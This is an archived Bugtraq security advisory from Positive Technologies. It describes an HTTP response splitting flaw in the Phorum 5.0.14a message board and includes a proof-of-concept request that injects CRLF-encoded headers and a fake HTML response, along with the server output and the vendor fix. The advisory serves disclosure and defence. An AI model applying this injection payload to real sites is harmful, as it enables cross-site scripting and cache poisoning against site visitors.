[ Positive Technologies #SA] Phorum "location" HTTP Response Splitting Vulnerability

From: Alexander Anisimov (anisimov_at_ptsecurity.com)
Date: 03/22/05

  • Next message: Amit Klein (AKsecurity): "Re: New Whitepaper: Anti Brute Force Resource Metering" 
    Date: 22 Mar 2005 14:37:39 -0000
To: bugtraq@securityfocus.com
    ('binary' encoding is not supported, stored as-is)

             [ Positive Technologies SA-20050322 ]
       Phorum "location" HTTP Response Splitting Vulnerability.

       Release Date: 03/22/2005
       Date Reported: 03/10/2005
       Severity: Medium
       Application: Phorum
       Platform: PHP
       Vendor: http://www.phorum.org
       Affects versions: 5.0.14a
                         Other versions may also be affected.

    I. BACKGROUND

    Phorum is a web based message board written in PHP. Phorum is designed
    with high-availability and visitor ease of use in mind. Features such
    as mailing list integration, easy customization and simple installation
    make Phorum a powerful add-in to any website.

    II. DESCRIPTION

    Input passed to the "Location" parameter is not properly sanitised.
    This can be exploited to inject malicious characters into HTTP headers
    and may allow execution of arbitrary HTML and script code in a user's
    browser session in context of an affected site.

     
    Request:
    http://[server]/phorum5/search.php?forum_id=0&search=1&body=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a<html>Scanned by PTsecurity</html>%0d%0a&author=1&subject=1&match_forum=ALL&match_type=ALL&match_dates=30

    Result:

    HTTP/1.1 302 Found
    Date: Tue, 01 Mar 2005 12:33:53 GMT
    Server: Apache/1.3.31 (Unix) PHP/4.3.10
    X-Powered-By: PHP/4.3.10
    Location: http://[server]/phorum5/search.php?0,search=1,page=1,match_type=ALL,match_dates=30,match_forum=ALL,body=
    Content-Length: 0

    HTTP/1.0 200 OK
    Content-Type: text/html
    Content-Length: 34

    <html>Scanned by PTsecurity</html>
    ,author=1,subject=1
    Connection: close
    Content-Type: text/html

    <...>

    This vulnerability was discovered by Positive Technologies using MaxPatrol
    (www.maxpatrol.com) - intellectual professional security scanner. It is able to detect a substantial amount of vulnerabilities not published yet.
    MaxPatrol's intelligent algorithms are also capable to detect a lot of
    vulnerabilities in custom web-scripts (XSS, SQL and code injections, HTTP Response splitting).

    The vulnerability has been reported in Phorum version 5.0.14.
    Other versions may also be affected.

    III. ANALYSIS

    Exploitation of this vulnerability allows remote attackers to mount various
    kinds of attacks. For example: Cross-Site Scripting (XSS), Web Cache
    Poisoning (deface), Browser cache poisoning, Hijacking pages with
    user-specific information and etc...

    IV. SOLUTION
    Update to version 5.0.15a.

    http://phorum.org/story.php?48
    http://phorum.org/downloads/phorum-5.0.15a.tar.gz

  • Next message: Amit Klein (AKsecurity): "Re: New Whitepaper: Anti Brute Force Resource Metering"

    Relevant Pages